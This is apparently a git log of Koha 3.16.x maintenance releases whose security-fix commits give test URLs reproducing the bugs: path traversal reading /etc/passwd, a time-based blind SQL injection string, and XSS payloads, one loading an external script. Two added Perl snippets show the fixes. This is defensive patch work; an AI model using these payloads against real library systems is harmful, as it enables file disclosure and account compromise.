8 years ago Bug 14408 (3.16/3.14) regex fix for .tmpl files too v3.16.12
Mason James [Wed, 24 Jun 2015 18:38:30 +0000 (06:38 +1200)]
Bug 14408 (3.16/3.14) regex fix for .tmpl files too

8 years ago Bug 14408: Allow integers in template paths
Jonathan Druart [Mon, 22 Jun 2015 08:24:51 +0000 (10:24 +0200)]
Bug 14408: Allow integers in template paths

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
8 years ago Bug 14408: Add tests to get_template_and_user
Jonathan Druart [Fri, 19 Jun 2015 08:25:30 +0000 (10:25 +0200)]
Bug 14408: Add tests to get_template_and_user

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years ago Bug 14408 Path Traversal error
Chris [Mon, 22 Jun 2015 05:23:52 +0000 (05:23 +0000)]
Bug 14408 Path Traversal error

Counter counter patch
Please test well, including with the null byte %00, this uses a whitelisting to only allow files ending with .tt
and not allowing ../etc

Note the previous patch tries to protect against /etc/passwd
but //etc/passwd is now vulnerable.  I do think a whitelist is safer than trying to do a blacklist

/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search

Are vulnerable

To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
  Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  (You may have to add more ..%2f or remove them to get the correct path)
  Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found

Repeat for the other script also

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
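
Added example, not Koha's code or part of this commit: the whitelist approach the message above argues for, checked against the test plan's paths and set beside a prefix blacklist for contrast. The function names, the template root and the exact pattern are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example: whitelist validation of a template_path parameter.
# Not Koha's code; names, root directory and pattern are illustrative.
use strict;
use warnings;

# Hypothetical template root (placeholder, not a real Koha path).
my $TEMPLATE_ROOT = '/srv/example/templates';

# Stand-in for the single URL-decoding step CGI applies to query parameters.
sub url_decode {
    my ($s) = @_;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Blacklist, for contrast only: refuse inputs that look like known-bad ones.
sub blacklist_ok {
    my ($path) = @_;
    return 0 if $path =~ m{\.\./};      # parent-directory hops
    return 0 if $path =~ m{^/etc/};     # the one absolute path thought of
    return 1;                           # everything else is let through
}

# Whitelist: accept only relative paths built from plain name segments
# and ending in ".tt". \A and \z anchor the whole string; "$" would also
# match before a trailing newline. Dots are allowed only in the extension,
# so "..", a leading "/", "//" and "\0" can never match.
sub whitelist_ok {
    my ($path) = @_;
    return 0 unless defined $path;
    return $path =~ m{\A(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.tt\z} ? 1 : 0;
}

# Full path to open, or nothing if the parameter is rejected.
sub resolve_template {
    my ($raw) = @_;
    my $path = url_decode($raw);
    return unless whitelist_ok($path);
    return "$TEMPLATE_ROOT/$path";
}

# Make control characters visible when printing a sample.
sub printable {
    my ($s) = @_;
    $s =~ s/([^\x20-\x7e])/sprintf('\\x%02x', ord($1))/ge;
    return $s;
}

# Samples: the first four come from the commit message and its test plan,
# the rest are constructed edge cases (null byte, trailing newline, digits).
my @samples = (
    'members/tables/members_results.tt',
    ('..%2f' x 16) . 'etc%2fpasswd',
    'test%2f' . ('..%2f' x 16) . 'etc%2fpasswd',
    '//etc/passwd',
    '..%2f..%2fetc%2fpasswd%00.tt',
    'members/tables/members_results.tt%0a',
    'members/tables2/results_v2.tt',
);

printf "%-9s %-9s %s\n", 'blacklist', 'whitelist', 'decoded template_path';
for my $raw (@samples) {
    my $path = url_decode($raw);
    printf "%-9s %-9s %s\n",
        blacklist_ok($path)                ? 'pass' : 'reject',
        defined(resolve_template($raw))    ? 'pass' : 'reject',
        printable($path);
}
```

A deployment would also resolve the joined path and confirm it still lies under the template root before opening it, since the pattern alone does not account for symlinks.
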
8 years agoRevert "Bug 14408 Path traversal vulnerability"
Mason James [Wed, 24 Jun 2015 17:05:33 +0000 (05:05 +1200)]
Revert "Bug 14408 Path traversal vulnerability"

This reverts commit 0b7647eff31c85d8f7e1e5a50fd82d3b94eec816.

8 years agoRevert "Bug 14408: Add tests to get_template_and_user"
Mason James [Wed, 24 Jun 2015 17:05:14 +0000 (05:05 +1200)]
Revert "Bug 14408: Add tests to get_template_and_user"

This reverts commit e8a3febfe7050870116db0512e1a39690a72346c.

8 years agoupdate notes
Mason James [Tue, 23 Jun 2015 13:39:18 +0000 (01:39 +1200)]
update notes

8 years agoBumping DB version for 3.16.12
Mason James [Tue, 23 Jun 2015 13:20:11 +0000 (01:20 +1200)]
Bumping DB version for 3.16.12

8 years agoAdd release notes for 3.16.12
Mason James [Tue, 23 Jun 2015 12:19:27 +0000 (00:19 +1200)]
Add release notes for 3.16.12

8 years agoTranslation updates for Koha 3.16.12 release
Bernardo Gonzalez Kriegel [Tue, 23 Jun 2015 01:08:56 +0000 (22:08 -0300)]
Translation updates for Koha 3.16.12 release

Bengali files renamed, ben -> bn-IN

8 years agoBug 14423 : Multiple XSS bugs in suggestion.pl
Chris [Sun, 21 Jun 2015 09:35:07 +0000 (09:35 +0000)]
Bug 14423 : Multiple XSS bugs in suggestion.pl

To test
1/ Hit a url like http://localhost:8081/cgi-bin/koha/suggestion/suggestion.pl?author=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&accepteddate_to=
2/ Notice alert box(es)
3/ Apply patch
4/ Reload and notice alert is gone

Repeat for
collection_title
copyrightdate
isbn
manageddate_from
manageddate_to
publishercode
suggesteddate_from
suggesteddate_to

8 years agoBug 14423 : Multiple XSS vulnerabilities in serials-search
Chris [Sun, 21 Jun 2015 09:20:51 +0000 (09:20 +0000)]
Bug 14423 : Multiple XSS vulnerabilities in serials-search

To test

1/ Hit a url like http://localhost:8081/cgi-bin/koha/serials/serials-search.pl?bookseller_filter=%22%22%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&searched=1&title_filter=
2/ Notice alert boxes
3/ Apply patch
4/ Reload, notice fixed

Repeat for
callnumber_filter
EAN_filter
ISSN_filter
publisher_filter
title_filter

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14423 : XSS bugs in catalogue search
Chris [Sun, 21 Jun 2015 09:01:32 +0000 (09:01 +0000)]
Bug 14423 : XSS bugs in catalogue search

To test

1/ hit a url like http://localhost:8081/cgi-bin/koha/catalogue/search.pl?limit=%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice alert boxes
3/ Apply patch
4/ Reload url, no alerts
5/ Check search still works

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14423 : XSS issues in marc_subfields_structure
Chris [Sun, 21 Jun 2015 08:46:40 +0000 (08:46 +0000)]
Bug 14423 : XSS issues in marc_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/marc_subfields_structure.pl?op=add_form&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice all the alert boxes
3/ Apply patch
4/ Reload page, no more alerts
5/ Test functionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14423 XSS bug in auth_subfields_structure
Chris [Sun, 21 Jun 2015 08:33:13 +0000 (08:33 +0000)]
Bug 14423 XSS bug in auth_subfields_structure

1/ Hit a url like http://localhost:8081/cgi-bin/koha/admin/auth_subfields_structure.pl?op=add_form&authtypecode=%27%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E&tagfield=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice a ton of alert boxes pop up
3/ Apply patch
4/ Reload url, no longer get any alerts
5/ Test functionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14423 : XSS bug in lateorders
Chris [Sun, 21 Jun 2015 08:18:20 +0000 (08:18 +0000)]
Bug 14423 : XSS bug in lateorders

1/ hit a url like http://localhost:8081/cgi-bin/koha/acqui/lateorders.pl?delay=<script>alert('oh noes')</script>&estimateddeliverydatefrom
2/ Note you get an alert box
3/ Apply patch notice it is fixed
4/ Test functionality still works

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14423 : XSS in authorities-home
Chris [Sun, 21 Jun 2015 08:10:20 +0000 (08:10 +0000)]
Bug 14423 : XSS in authorities-home

To test:
1/ Hit a url like http://localhost:8081/cgi-bin/koha/authorities/authorities-home.pl?op=do_search&type=intranet&marclist=mainentry&and_or=and&operator=contains&value=%22/%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
2/ Notice you get 3 alert boxes
3/ Apply patch
4/ Hit the url again, no js

Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14412 : SQL injection possible
Chris Cormack [Thu, 18 Jun 2015 20:35:07 +0000 (08:35 +1200)]
Bug 14412 : SQL injection possible

There is a SQL Injection vulnerability in the
/cgi-bin/koha/opac-tags_subject.pl script.

By manipulating the variable 'number', the database can be accessed
via time-based blind injections.

The following string serves as an example:

/cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)

To exploit the vulnerability, no authentication is needed

To test
1/ Turn on mysql query logging
2/ Hit /cgi-bin/koha/opac-tags_subject.pl?number=1+PROCEDURE+ANALYSE+(EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
3/ Check the logs notice something like
  SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1
  PROCEDURE ANALYSE
  (EXTRACTVALUE(9743,CONCAT(0x5c,(BENCHMARK(5000000,MD5('evil'))))),1)
4/ Apply patch
5/ Hit the url again
6/ Notice the log now only has
   SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT 1

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed the problem and the fix for it.
Signed-off-by: Mason James <mtj@kohaaloha.com>
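
Added example, not the patch from this commit or Koha's code: the 'number' parameter from the test plan reduced to a bounded integer and bound as a typed placeholder in the LIMIT clause, with the interpolated statement text printed for contrast. The in-memory SQLite database (DBD::SQLite assumed installed), the sample rows, the function names, the default of 100 and the cap of 1000 are assumptions.

```perl
#!/usr/bin/perl
# Added example: keeping a request parameter out of the SQL text of a LIMIT clause.
# Not Koha's code; SQLite stands in for MySQL so the example runs offline.
use strict;
use warnings;
use DBI qw(:sql_types);

# Constructed stand-in for the tags table named in the logged query.
my $dbh = DBI->connect('dbi:SQLite:dbname=:memory:', '', '',
    { RaiseError => 1, PrintError => 0 });
$dbh->do('CREATE TABLE tags (entry TEXT, weight INTEGER)');
my $ins = $dbh->prepare('INSERT INTO tags (entry, weight) VALUES (?, ?)');
$ins->execute(@$_) for ( ['history', 12], ['maps', 7], ['poetry', 3] );

# Before: the raw parameter becomes part of the statement text, so anything
# after the digits is parsed as SQL. Built here only to be printed.
sub interpolated_sql {
    my ($raw) = @_;
    return "SELECT entry,weight FROM tags ORDER BY weight DESC LIMIT $raw";
}

# Reduce the parameter to an integer in [1, $max]; anything else gets $default.
# \A and \z anchor the whole string, so "3\n" is refused as well.
sub clean_number {
    my ($raw, $default, $max) = @_;
    return $default unless defined($raw) && $raw =~ /\A[0-9]{1,9}\z/;
    my $n = $raw + 0;
    return $default if $n < 1;
    return $n > $max ? $max : $n;
}

# After: the statement text is constant and the value travels as an integer
# bind. Typing the bind as SQL_INTEGER keeps a driver from sending it as a
# quoted string, which MySQL does not accept in LIMIT.
sub top_tags {
    my ($dbh, $raw_number) = @_;
    my $limit = clean_number($raw_number, 100, 1000);
    my $sth = $dbh->prepare(
        'SELECT entry, weight FROM tags ORDER BY weight DESC LIMIT ?');
    $sth->bind_param(1, $limit, SQL_INTEGER);
    $sth->execute;
    return $sth->fetchall_arrayref;
}

# Abbreviated, constructed form of the string used in the test plan.
my $probe = '1 PROCEDURE ANALYSE (...)';
print 'interpolated: ', interpolated_sql($probe), "\n";

for my $raw ('2', $probe, undef, '0', '99999', "3\n") {
    my $limit = clean_number($raw, 100, 1000);
    my $rows  = top_tags($dbh, $raw);
    my $shown = defined($raw) ? $raw : 'undef';
    $shown =~ s/\n/\\n/g;
    printf "%-28s LIMIT %-5d %d row(s)\n", $shown, $limit, scalar @$rows;
}
```
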
8 years agoBug 14408: Add tests to get_template_and_user
Jonathan Druart [Fri, 19 Jun 2015 08:25:30 +0000 (10:25 +0200)]
Bug 14408: Add tests to get_template_and_user

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14408 Path traversal vulnerability
Jonathan Druart [Fri, 19 Jun 2015 08:12:45 +0000 (10:12 +0200)]
Bug 14408 Path traversal vulnerability

/cgi-bin/koha/svc/virtualshelves/search
/cgi-bin/koha/svc/members/search

Are vulnerable

To test:
1/ Hit /cgi-bin/koha/svc/members/search?template_path=members/tables/members_results.tt
  Notice you get a valid JSON response
2/ Hit
/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
  (You may have to add more ..%2f or remove them to get the correct path)
  Notice you can see the contents of the /etc/passwd file
3/ Hit
/cgi-bin/koha/svc/members/search?template_path=test%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4/ Apply patch
5/ Hit the first url again, notice it still works
6/ Hit the second url notice it now errors with a file not found
7/ Hit the third url notice it now errors with a file not found

Repeat for the other script also

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14416: Stored XSS vulnerability - add biblio to shelf (intranet)
Jonathan Druart [Fri, 19 Jun 2015 09:21:56 +0000 (11:21 +0200)]
Bug 14416: Stored XSS vulnerability - add biblio to shelf (intranet)

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14416: (follow-up) opac addbybilionumber
Jonathan Druart [Fri, 19 Jun 2015 09:21:47 +0000 (11:21 +0200)]
Bug 14416: (follow-up) opac addbybilionumber

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14416 Stored XSS vulnerability
Chris Cormack [Thu, 18 Jun 2015 23:26:02 +0000 (11:26 +1200)]
Bug 14416 Stored XSS vulnerability

opac-addbybiblionumber.pl is also vulnerable because it doesn't escape
list names.

To test
1/ Create a malicious list name
2/ Try to add a biblio to the lists
3/ Notice js is executed
4/ Apply patch
5/ Test again

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14418 : More XSS vulnerabilities in opac-shelves.pl
Chris Cormack [Thu, 18 Jun 2015 23:41:45 +0000 (11:41 +1200)]
Bug 14418 : More XSS vulnerabilities in opac-shelves.pl

To test:
1/ Hit a url like
/cgi-bin/koha/opac-shelves.pl?viewshelf=7&op=modif&display="><script>alert('oh
noes')</script>  Where the id is a valid shelf id
2/ Notice the js is executed
3/ Apply patch
4/ Reload page
5/ Notice input is now escaped on display

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Tested in Debian, couldn't reproduce the alert in Iceweasel, but in
Chromium. Patch fixes it.

8 years agoBug 14418 : XSS flaw in opac-shelves.pl
Chris Cormack [Thu, 18 Jun 2015 23:30:22 +0000 (11:30 +1200)]
Bug 14418 : XSS flaw in opac-shelves.pl

To test:
1/ Create a list and add at least one item to it
2/ Hit a url like http://192.168.2.18/cgi-bin/koha/opac-shelves.pl?viewshelf=7&sort=author&direction=%22%3E%3Cscript%3Ealert%28%27oh%20noes%27%29%3C/script%3E
  Where the shelf id is the number of the list you created, notice the js is executed
3/ Apply the patch
4/ Reload the page notice the js is now escaped

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
8 years agoBug 14418 XSS Vulnerabilities
Chris Cormack [Thu, 18 Jun 2015 21:25:22 +0000 (09:25 +1200)]
Bug 14418 XSS Vulnerabilities

Fix for /cgi-bin/koha/opac-search.pl

To test

1/ Hit /cgi-bin/koha/opac-search.pl?tag="><script
src='http://cst.sba-research.org/x.js'/>&q=a
2/ Notice the js is executed
3/ Apply patch
4/ Reload page, notice it is no longer executed
5/ Test the rss links work still

Signed-off-by: Jonathan Druart <jonathan.druart@koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
Confirmed bug and that the patch fixes it.
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14360: Unescaped variable causes alert pop-up
Aleisha [Tue, 9 Jun 2015 02:02:55 +0000 (02:02 +0000)]
Bug 14360: Unescaped variable causes alert pop-up

To test:

1) Create a list in the OPAC, name it: <script>alert('Hello');</script>
2) Delete the list
3) Confirm deletion
4) See the alert say 'Hello'
5) Apply patch
6) Recreate list with same name
7) Delete list
8) Confirm deletion and alert no longer pops up

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14360: Unescaped variable causes alert
Aleisha [Mon, 8 Jun 2015 02:30:23 +0000 (02:30 +0000)]
Bug 14360: Unescaped variable causes alert

Adding |html to [% resultsperpage %] to escape the variable and get rid of the alert.

To test:

1) Go to URL such as ...  /cgi-bin/koha/opac-authorities-home.pl?op=do_search&resultsperpage=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2) Notice pop-up box with alert
3) Apply patch, refresh page
4) Notice alert is gone

Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBumping DB version for 3.16.11 v3.16.11
Mason James [Sun, 31 May 2015 00:51:20 +0000 (12:51 +1200)]
Bumping DB version for 3.16.11

8 years agoAdd release notes for 3.16.11
Mason James [Sun, 31 May 2015 01:27:58 +0000 (13:27 +1200)]
Add release notes for 3.16.11

8 years agoTranslation updates for Koha 3.16.11 release
Bernardo Gonzalez Kriegel [Sat, 30 May 2015 04:31:19 +0000 (01:31 -0300)]
Translation updates for Koha 3.16.11 release

8 years agoBug 14068: fix preinst for fresh package installs
Robin Sheat [Tue, 28 Apr 2015 03:19:30 +0000 (15:19 +1200)]
Bug 14068: fix preinst for fresh package installs

Signed-off-by: Mirko Tietgen <mirko@abunchofthings.net>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Works as expected. Tested both upgrading and on a new install.
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14055: remove symlink that breaks upgrades
Robin Sheat [Fri, 24 Apr 2015 02:48:53 +0000 (14:48 +1200)]
Bug 14055: remove symlink that breaks upgrades

Old versions of koha-common would put in a symlink to the system YUI
libraries. This causes upgrade problems, so we look out for that and zap
it if it's there.

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14006: about.pl checks the wrong zebra index mode
Tomas Cohen Arazi [Mon, 20 Apr 2015 18:39:45 +0000 (15:39 -0300)]
Bug 14006: about.pl checks the wrong zebra index mode

When setting zebra_bib_index_mode to grs1 I get two warnings when not applying the patch:

"The <zebra_bib_index_mode> entry is set to grs1. GRS-1 support is now deprecated and will be removed in future releases. Please use DOM instead by setting <zebra_bib_index_mode> to dom (full reindex required)."

"You have set <use_zebra_facets> but the <zebra_bib_index_mode> is not set to dom. Falling back to legacy facet calculation."

When applying the patch a third warning appears in addition to the two previous ones:

"The <zebra_bib_index_mode> entry is set to dom, but your system still appears to be set up for grs1 indexing."

Seems like the patch does what it should to me regarding the configuration mismatch warning.

Signed-off-by: Eivin Giske Skaaren <eskaaren@yahoo.no>
Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14075: Undefined value creates noisy warns in C4::AuthoritiesMarc
Aleisha [Wed, 29 Apr 2015 01:56:45 +0000 (01:56 +0000)]
Bug 14075: Undefined value creates noisy warns in C4::AuthoritiesMarc

This match sets $sortby (previously undefined value) as an empty string to get rid of the warns.

To test:

1) Go to a URL such as http://localhost:8080/cgi-bin/koha/opac-authorities-home.pl?op=do_search&type=opac&operator=contains&value=a&marclist=any&and_or=and
2) Notice the warns in the error log
3) Apply patch
4) Reload URL
5) Notice page still works but no warns in error log

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
NOTE: I would have done $sortby //= '';
      But this works too. :)

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14204: (QA followup) remove unneeded messages
Tomas Cohen Arazi [Fri, 15 May 2015 18:28:56 +0000 (15:28 -0300)]
Bug 14204: (QA followup) remove unneeded messages

TEST PLAN
---------
1) Apply first patch
2) prove -v t/db_dependent/Labels/t_Batch.t
   -- YUCK! No meaningful messages on a lot of the ok's.
3) Apply this patch
4) prove -v t/db_dependent/Labels/t_Batch.t
   -- YAY! Meaningful test results
5) koha qa test tools

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 14204: Fix t/db_dependent/Labels/t_Batch.t failing test from Bug 12991
Nick Clemens [Thu, 14 May 2015 19:56:43 +0000 (19:56 +0000)]
Bug 14204: Fix t/db_dependent/Labels/t_Batch.t failing test from Bug 12991

This patch updates the batch_id variable after items are added to test batch

To test:
1. prove t/db_dependent/Labels/t_Batch.t and see two tests fail
2. apply patch
3. prove again, tests pass!

Signed-off-by: Mark Tompsett <mtompset@hotmail.com>
NOTE: The $batch->add_item() call to C4::Creators::Batch::add_item
      triggers the change of the batch_id so this line is necessary!
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 13109 - Serial failure for received and general viewing.
Mason James [Mon, 30 Mar 2015 06:33:45 +0000 (19:33 +1300)]
Bug 13109 - Serial failure for received and general viewing.

to test...

1/ attempt to view a subscription-detail that has a NULL value for either its 'startdate' or 'enddate'

  an example url would be...
  http://koha-admin.foo.org/cgi-bin/koha/serials/subscription-detail.pl?subscriptionid=1

  observe error...
  'Date::Calc::PP::Delta_Days(): Usage: Date::Calc::Delta_Days($year1,$month1,$day1,$year2,$month2,$day2) at /your/koha/C4/Serials.pm line 2325'

2/ apply patch
3/ repeat step 1/
   observe that detail page displays OK

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
I confirm the issue if startdate is null (can exist with old data,
before the js check on the form).
Amended patch: Remove trailing space char and the link to the bz number
(can be found using git log).

Signed-off-by: Katrin Fischer <katrin.fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 12445 [QA Followup] - Clear issues table before clearing borrrowers table
Kyle M Hall [Fri, 25 Jul 2014 13:12:36 +0000 (09:12 -0400)]
Bug 12445 [QA Followup] - Clear issues table before clearing borrrowers table

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
All tests pass, even more now than before.
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 12445: ading unit tests to test the routines : CountSuggestion, ConnectSuggestion...
Yohann Dufour [Thu, 19 Jun 2014 14:32:05 +0000 (16:32 +0200)]
Bug 12445: ading unit tests to test the routines : CountSuggestion, ConnectSuggestionAndBiblio, SearchSuggestion, GetSuggestionInfo, DelSuggestion, GetSuggestionByStatus

These routines were not tested

Test plan:
1/ Execute the command : prove t/db_dependent/Suggestions.t
2/ The result has to be a success without error or warning :
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=89,  1 wallclock secs ( 0.05 usr  0.01 sys +  1.52 cusr  0.08 csys =  1.66 CPU)
Result: PASS

Signed-off-by: Paola Rossi <paola.rossi@cineca.it>
Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Test pass, no koha-qa errors

But now there are 91!
prove t/db_dependent/Suggestions.t
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=91,  2 wallclock secs ( 0.05 usr  0.00 sys +  1.77 cusr  0.10 csys =  1.92 CPU)
Result: PASS

Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 12445: Improving unit tests for C4::Suggestions.pm
Yohann Dufour [Thu, 19 Jun 2014 07:14:24 +0000 (09:14 +0200)]
Bug 12445: Improving unit tests for C4::Suggestions.pm

Now, the tests used 'is' instead of 'ok', the tests are wrapped in a transaction, adding tests for the routines NewSuggestion, GetSuggestion, ModSuggestion, GetSuggestionFromBiblionumber and GetInfoFromBiblionumber.

The tests for the routines DelSuggestionsOlderThan, CountSuggestion, ConnectSuggestionAndBiblio, SearchSuggestion, GetSuggestionInfo, DelSuggestion and GetSuggestionByStatus will arrive in another patch.

Test plan:
1/ Execute the command : prove t/db_dependent/Suggestions.t
2/ The result has to be a success without warning or error :
t/db_dependent/Suggestions.t .. ok
All tests successful.
Files=1, Tests=32,  2 wallclock secs ( 0.03 usr  0.01 sys +  1.49 cusr  0.08 csys =  1.61 CPU)
Result: PASS

Signed-off-by: Paola Rossi <paola.rossi@cineca.it>
Signed-off-by: Bernardo Gonzalez Kriegel <bgkriegel@gmail.com>
Signed-off-by: Jonathan Druart <jonathan.druart@biblibre.com>
Signed-off-by: Katrin Fischer <Katrin.Fischer.83@web.de>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 13645: dependencies for libdbix-connector-perl
Robin Sheat [Tue, 24 Feb 2015 05:32:30 +0000 (18:32 +1300)]
Bug 13645: dependencies for libdbix-connector-perl

8 years agoBug 13645 [QA Followup] - Add DBIx::Connector to the list of dependancies
Kyle M Hall [Fri, 20 Feb 2015 14:54:35 +0000 (09:54 -0500)]
Bug 13645 [QA Followup] - Add DBIx::Connector to the list of dependancies

Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
8 years agoBug 13645: Use DBIx::Connector
Jonathan Druart [Tue, 10 Feb 2015 09:47:05 +0000 (10:47 +0100)]
Bug 13645: Use DBIx::Connector

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 13645: Cache the DBIx connection
Jonathan Druart [Fri, 30 Jan 2015 16:10:54 +0000 (17:10 +0100)]
Bug 13645: Cache the DBIx connection

We don't want to recreate a new connection to the DB every time we want
a new schema.

This patch creates a $database package level variable on the same way
it's done in C4::Context for $dbh.

Signed-off-by: Jacek Ablewicz <abl@biblos.pk.edu.pl>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Mason James <mtj@kohaaloha.com>
8 years agoBug 7904: 3.16.x followup
Mason James [Fri, 29 May 2015 05:37:32 +0000 (17:37 +1200)]
Bug 7904: 3.16.x followup

revert failing verify_cksum() test

Signed-off-by: Mason James <mtj@kohaaloha.com>
modified:   t/SIP_Sip.t

8 years agoBug 7904: (QA followup) fix tests
Tomas Cohen Arazi [Thu, 5 Feb 2015 18:50:30 +0000 (15:50 -0300)]
Bug 7904: (QA followup) fix tests

The package name for SIP wasn't fixed in the tests by the original patches.

This patch fixes it.

To test:
- Run
  $ prove t/db_dependent/SIP_ILS.t
- Tests should pass with the patch.

Signed-off-by: Tomas Cohen Arazi <tomascohen@gmail.com>
8 years agoBug 7904 Change SIP modules to use standard LIB path
Colin Campbell [Thu, 30 Oct 2014 15:36:09 +0000 (15:36 +0000)]
Bug 7904 Change SIP modules to use standard LIB path

For historical reasons the SIPServer and SIP modules
have used an extra module path in addition to the
standard Koha one. This has caused numerous irritants
